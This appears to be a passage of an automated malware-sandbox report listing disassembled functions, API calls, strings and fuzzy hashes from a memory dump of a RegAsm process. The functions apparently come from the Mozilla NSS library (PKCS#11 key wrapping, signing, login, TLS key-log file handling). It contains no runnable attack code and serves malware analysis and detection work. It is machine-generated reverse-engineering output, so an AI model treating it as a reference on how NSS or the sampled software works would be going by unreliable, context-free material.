PR_LogPrint.NSS3(?,00000000), ref: 6C188F96
PR_LogPrint.NSS3( pWrappedKey = 0x%p,?), ref: 6C188FB2
PR_LogPrint.NSS3( pulWrappedKeyLen = 0x%p,?), ref: 6C188FCD
PR_LogPrint.NSS3( *pulWrappedKeyLen = 0x%x,?), ref: 6C189047

Strings

(CK_INVALID_HANDLE), xrefs: 6C188EAC, 6C188F1F, 6C188F79
hKey = 0x%x, xrefs: 6C188F5B, 6C188F6B
hSession = 0x%x, xrefs: 6C188E8E, 6C188E9E
pMechanism = 0x%p, xrefs: 6C188EE0
hWrappingKey = 0x%x, xrefs: 6C188F01, 6C188F11
C_WrapKey, xrefs: 6C188E71
pWrappedKey = 0x%p, xrefs: 6C188FAD
pulWrappedKeyLen = 0x%p, xrefs: 6C188FC8
n&l, xrefs: 6C188FEC, 6C189023
*pulWrappedKeyLen = 0x%x, xrefs: 6C189042

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulWrappedKeyLen = 0x%x$ hKey = 0x%x$ hSession = 0x%x$ hWrappingKey = 0x%x$ pMechanism = 0x%p$ pWrappedKey = 0x%p$ pulWrappedKeyLen = 0x%p$ (CK_INVALID_HANDLE)$C_WrapKey$n&l
API String ID: 1003633598-299655949
Opcode ID: bce9314d5a38c262366611aa2e22f718292f731616e27990fecf5614507e80b8
Instruction ID: 0ef61d8e3ee95f49623ccd417170a4b91d948ce82092e5cebf0e78c26e91ddad
Opcode Fuzzy Hash: bce9314d5a38c262366611aa2e22f718292f731616e27990fecf5614507e80b8
Instruction Fuzzy Hash: 4A51D471607208AFEB00DF55DD8CF9A3776AB4230CF084065FD096BA92DB30A958CFA5

Function 6C1B4C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C1A4F51,00000000), ref: 6C1B4C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C1A4F51,00000000), ref: 6C1B4C5B
PR_smprintf.NSS3(6C28AAF9,?,0000002F,?,?,?,00000000,00000000,?,6C1A4F51,00000000), ref: 6C1B4C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C1A4F51,00000000), ref: 6C1B4CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C1B4CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C1B4CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C1B4D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C1A4F51,00000000), ref: 6C1B4D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C1A4F51,00000000), ref: 6C1B4D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C1B4D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C1B4DA2
free.MOZGLUE(?), ref: 6C1B4DB9
free.MOZGLUE(00000000), ref: 6C1B4DCF

Strings

0x%08lx=[%s %s], xrefs: 6C1B4D80
every, xrefs: 6C1B4CA1
rust, xrefs: 6C1B4D22
ootT, xrefs: 6C1B4D1A
timeout, xrefs: 6C1B4C91
0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 6C1B4D9D
any, xrefs: 6C1B4C96
slotFlags, xrefs: 6C1B4D34
%s,%s, xrefs: 6C1B4C4B
rootFlags, xrefs: 6C1B4D47

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
API String ID: 3756394533-2552752316
Opcode ID: e122d30123fd300df13875d9fed56f7e1bc90b88fd8802e30b2cbf164af2fe60
Instruction ID: 2d154060df22d9b97a8fee4464cccf6c3461d12c4bdbb78f3b8d5cbd517c622d
Opcode Fuzzy Hash: e122d30123fd300df13875d9fed56f7e1bc90b88fd8802e30b2cbf164af2fe60
Instruction Fuzzy Hash: A7417DB2A001459BD7119F589C446BF7765AF62718F04C124EC192BB81E731E828CFE3

Function 6C18AF20 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 126COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SignMessage), ref: 6C18AF46
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C18AF74
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C18AF83

Part of subcall function 6C26D930: PL_strncpyz.NSS3(?,?,?), ref: 6C26D963

PR_LogPrint.NSS3(?,00000000), ref: 6C18AF99
PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6C18AFBE
PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6C18AFD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C18AFF4
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C18B00F
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6C18B028
PR_LogPrint.NSS3( pulSignatureLen = 0x%p,?), ref: 6C18B041

Strings

pParameter = 0x%p, xrefs: 6C18AFB9
C_SignMessage, xrefs: 6C18AF41
(CK_INVALID_HANDLE), xrefs: 6C18AF7C
hSession = 0x%x, xrefs: 6C18AF5E, 6C18AF6E
ulDataLen = %d, xrefs: 6C18B00A
pulSignatureLen = 0x%p, xrefs: 6C18B03C
pData = 0x%p, xrefs: 6C18AFEF
pSignature = 0x%p, xrefs: 6C18B023
n&l, xrefs: 6C18B059, 6C18B093
ulParameterLen = 0x%p, xrefs: 6C18AFD4

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pData = 0x%p$ pParameter = 0x%p$ pSignature = 0x%p$ pulSignatureLen = 0x%p$ ulDataLen = %d$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$C_SignMessage$n&l
API String ID: 1003633598-3907302000
Opcode ID: 9897a9fe48c0d77a322d20d20dfe1ff3416fbac2903ac3570ef28d2f3595b353
Instruction ID: 044d2c20627604d0481dbf886249c0be30e782254cf92abcf2b50d31c08f858b
Opcode Fuzzy Hash: 9897a9fe48c0d77a322d20d20dfe1ff3416fbac2903ac3570ef28d2f3595b353
Instruction Fuzzy Hash: BA41B5B5606148AFDB10CF54DD8CB8937B2AB4230DF094464FD086BA92DB34E858DFA9

Function 6C192D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C192DEC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C192E00
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C192E2B
PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C192E43
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C164F1C,?,-00000001,00000000,?), ref: 6C192E74
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C164F1C,?,-00000001,00000000), ref: 6C192E88
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C192EC6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C192EE4
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C192EF8
PR_Unlock.NSS3(?), ref: 6C192F62
TlsGetValue.KERNEL32 ref: 6C192F86
EnterCriticalSection.KERNEL32(0000001C), ref: 6C192F9E
PR_Unlock.NSS3(?), ref: 6C192FCA
TlsGetValue.KERNEL32 ref: 6C19301A
EnterCriticalSection.KERNEL32(?), ref: 6C19302E
PR_Unlock.NSS3(?), ref: 6C193066
PR_SetError.NSS3(00000000,00000000), ref: 6C193085
PR_Unlock.NSS3(?), ref: 6C1930EC
TlsGetValue.KERNEL32 ref: 6C19310C
EnterCriticalSection.KERNEL32(0000001C), ref: 6C193124
PR_Unlock.NSS3(?), ref: 6C19314C

Part of subcall function 6C179180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C1A379E,?,6C179568,00000000,?,6C1A379E,?,00000001,?), ref: 6C17918D
Part of subcall function 6C179180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C1A379E,?,6C179568,00000000,?,6C1A379E,?,00000001,?), ref: 6C1791A0

Part of subcall function 6C1407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C0D204A), ref: 6C1407AD
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C0D204A), ref: 6C1407CD
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C0D204A), ref: 6C1407D6
Part of subcall function 6C1407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C0D204A), ref: 6C1407E4
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,6C0D204A), ref: 6C140864
Part of subcall function 6C1407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C140880
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,?,6C0D204A), ref: 6C1408CB
Part of subcall function 6C1407A0: TlsGetValue.KERNEL32(?,?,6C0D204A), ref: 6C1408D7
Part of subcall function 6C1407A0: TlsGetValue.KERNEL32(?,?,6C0D204A), ref: 6C1408FB

PR_SetError.NSS3(00000000,00000000), ref: 6C19316D

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
String ID:
API String ID: 3383223490-0
Opcode ID: 0fc310d8adf10cf583176642b65a52ec8df02bf1bbafd8d043f69ac694f7b161
Instruction ID: 4e6a59b5d7b2be999deaa0e8e43c770a23e0018c58914b426c5a8ba2bd36c5f4
Opcode Fuzzy Hash: 0fc310d8adf10cf583176642b65a52ec8df02bf1bbafd8d043f69ac694f7b161
Instruction Fuzzy Hash: 75F19EB1D002099FDF00DFA8D888BAEBBB4BF19318F544165EC05A7751EB31E996CB91

Function 6C186D60 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Digest), ref: 6C186D86
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C186DB4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C186DC3

Part of subcall function 6C26D930: PL_strncpyz.NSS3(?,?,?), ref: 6C26D963

PR_LogPrint.NSS3(?,00000000), ref: 6C186DD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C186DFA
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C186E13
PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6C186E2C
PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6C186E47
PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6C186EB9

Strings

(CK_INVALID_HANDLE), xrefs: 6C186DBC
C_Digest, xrefs: 6C186D81
hSession = 0x%x, xrefs: 6C186D9E, 6C186DAE
ulDataLen = %d, xrefs: 6C186E0E
*pulDigestLen = 0x%x, xrefs: 6C186EB4
pData = 0x%p, xrefs: 6C186DF5
pDigest = 0x%p, xrefs: 6C186E27
pulDigestLen = 0x%p, xrefs: 6C186E42
n&l, xrefs: 6C186E61, 6C186E95

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest$n&l
API String ID: 1003633598-4115297595
Opcode ID: df41ef227803c5e5a62319e23be5756328c603f6b7475b5c7e11e08193829886
Instruction ID: 1039fb3bd2f41b6fb312af97f7254f2a64275b27c37b09d9d56292b0017a0456
Opcode Fuzzy Hash: df41ef227803c5e5a62319e23be5756328c603f6b7475b5c7e11e08193829886
Instruction Fuzzy Hash: 5141D67561610CAFDB01DF55DD8CF8A3BB2AB4271CF044024ED09ABA92DB30A848CFB5

Function 6C189C40 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 118COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_LoginUser), ref: 6C189C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C189C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C189CA3

Part of subcall function 6C26D930: PL_strncpyz.NSS3(?,?,?), ref: 6C26D963

PR_LogPrint.NSS3(?,00000000), ref: 6C189CB9
PR_LogPrint.NSS3( userType = 0x%x,?), ref: 6C189CDA
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C189CF5
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C189D10
PR_LogPrint.NSS3( pUsername = 0x%p,?), ref: 6C189D29
PR_LogPrint.NSS3( ulUsernameLen = %d,?), ref: 6C189D42

Strings

(CK_INVALID_HANDLE), xrefs: 6C189C9C
pPin = 0x%p, xrefs: 6C189CF0
hSession = 0x%x, xrefs: 6C189C7E, 6C189C8E
ulUsernameLen = %d, xrefs: 6C189D3D
C_LoginUser, xrefs: 6C189C61
userType = 0x%x, xrefs: 6C189CD5
pUsername = 0x%p, xrefs: 6C189D24
n&l, xrefs: 6C189D5A, 6C189D91
ulPinLen = %d, xrefs: 6C189D0B

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ pUsername = 0x%p$ ulPinLen = %d$ ulUsernameLen = %d$ userType = 0x%x$ (CK_INVALID_HANDLE)$C_LoginUser$n&l
API String ID: 1003633598-1551068452
Opcode ID: 70fcd04c63c3c8cfe37fe17db59d29bd17b5a8155864264b42faab4830feb521
Instruction ID: 9ab1d8ca1655516bf57cdee68e7ffe880ee34ecaa7c4adb06e20aa83b36e0ef0
Opcode Fuzzy Hash: 70fcd04c63c3c8cfe37fe17db59d29bd17b5a8155864264b42faab4830feb521
Instruction Fuzzy Hash: BB41EAB5603148AFDB00DF55DD8CF8937B2AB4231DF484014ED096BB92DB31A858DFA9

Function 6C196CD0 Relevance: 30.3, APIs: 20, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C196910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C196943
Part of subcall function 6C196910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C196957
Part of subcall function 6C196910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C196972
Part of subcall function 6C196910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C196983
Part of subcall function 6C196910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C1969AA
Part of subcall function 6C196910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C1969BE
Part of subcall function 6C196910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C1969D2
Part of subcall function 6C196910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C1969DF
Part of subcall function 6C196910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C196A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C196D8C
free.MOZGLUE(00000000), ref: 6C196DC5
free.MOZGLUE(?), ref: 6C196DD6
free.MOZGLUE(?), ref: 6C196DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C196E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C196E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C196E72
free.MOZGLUE(?), ref: 6C196EA7
free.MOZGLUE(?), ref: 6C196EC4
free.MOZGLUE(?), ref: 6C196ED5
free.MOZGLUE(00000000), ref: 6C196EE3
free.MOZGLUE(?), ref: 6C196EF4
free.MOZGLUE(?), ref: 6C196F08
free.MOZGLUE(00000000), ref: 6C196F35
free.MOZGLUE(?), ref: 6C196F44
free.MOZGLUE(?), ref: 6C196F5B
free.MOZGLUE(00000000), ref: 6C196F65

Part of subcall function 6C196C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C19781D,00000000,6C18BE2C,?,6C196B1D,?,?,?,?,00000000,00000000,6C19781D), ref: 6C196C40
Part of subcall function 6C196C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C19781D,?,6C18BE2C,?), ref: 6C196C58
Part of subcall function 6C196C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C19781D), ref: 6C196C6F
Part of subcall function 6C196C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C196C84
Part of subcall function 6C196C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C196C96
Part of subcall function 6C196C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C196CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C196F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C196FC5
PK11_GetInternalKeySlot.NSS3 ref: 6C196FF4

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID:
API String ID: 1304971872-0
Opcode ID: c9c3fd50d09eeae3aea295b074bd3d5bdad4887c86725223f159ae4b6929ce5a
Instruction ID: e8ab78cc862973a5f0f57bb99cfa6f1e1d0416cf4f32ff3cbd0aa176535fc727
Opcode Fuzzy Hash: c9c3fd50d09eeae3aea295b074bd3d5bdad4887c86725223f159ae4b6929ce5a
Instruction Fuzzy Hash: 25B149B0E0120D9FEF41DFA5D884BAEBBB8AF15248F140025E815E7A41E735E954CBF1

Function 6C194C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C194C4C
EnterCriticalSection.KERNEL32(?), ref: 6C194C60
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C194CA1
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C194CBE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C194CD2
realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C194D3A
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C194D4F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C194DB7

Part of subcall function 6C1FDD70: TlsGetValue.KERNEL32 ref: 6C1FDD8C
Part of subcall function 6C1FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C1FDDB4

Part of subcall function 6C1407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C0D204A), ref: 6C1407AD
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C0D204A), ref: 6C1407CD
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C0D204A), ref: 6C1407D6
Part of subcall function 6C1407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C0D204A), ref: 6C1407E4
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,6C0D204A), ref: 6C140864
Part of subcall function 6C1407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C140880
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,?,6C0D204A), ref: 6C1408CB
Part of subcall function 6C1407A0: TlsGetValue.KERNEL32(?,?,6C0D204A), ref: 6C1408D7
Part of subcall function 6C1407A0: TlsGetValue.KERNEL32(?,?,6C0D204A), ref: 6C1408FB

TlsGetValue.KERNEL32 ref: 6C194DD7
EnterCriticalSection.KERNEL32(?), ref: 6C194DEC
PR_Unlock.NSS3(?), ref: 6C194E1B
PR_SetError.NSS3(00000000,00000000), ref: 6C194E2F
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C194E5A
PR_SetError.NSS3(00000000,00000000), ref: 6C194E71
free.MOZGLUE(00000000), ref: 6C194E7A
PR_Unlock.NSS3(?), ref: 6C194EA2
TlsGetValue.KERNEL32 ref: 6C194EC1
EnterCriticalSection.KERNEL32(?), ref: 6C194ED6
PR_Unlock.NSS3(?), ref: 6C194F01
free.MOZGLUE(00000000), ref: 6C194F2A

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
String ID:
API String ID: 759471828-0
Opcode ID: e41dfc7d53a5d3e0b0f8a4add31612e9a5cf285b6de0c1aa4b02b3cf7e112ccc
Instruction ID: 1d8c77a8fd500d19eb968aef0849f9298e7a5b67ec930f735d51cbfba729e511
Opcode Fuzzy Hash: e41dfc7d53a5d3e0b0f8a4add31612e9a5cf285b6de0c1aa4b02b3cf7e112ccc
Instruction Fuzzy Hash: 73B12375A002069FDF00EF68D888BAA77B4FF19318F054124ED2597B81EB35E965CBE1

Function 6C1E6E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C1E6BF7), ref: 6C1E6EB6

Part of subcall function 6C141240: TlsGetValue.KERNEL32(00000040,?,6C14116C,NSPR_LOG_MODULES), ref: 6C141267
Part of subcall function 6C141240: EnterCriticalSection.KERNEL32(?,?,?,6C14116C,NSPR_LOG_MODULES), ref: 6C14127C
Part of subcall function 6C141240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C14116C,NSPR_LOG_MODULES), ref: 6C141291
Part of subcall function 6C141240: PR_Unlock.NSS3(?,?,?,?,6C14116C,NSPR_LOG_MODULES), ref: 6C1412A0

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C28FC0A,6C1E6BF7), ref: 6C1E6ECD
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C1E6EE0
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C1E6EFC
PR_NewLock.NSS3 ref: 6C1E6F04
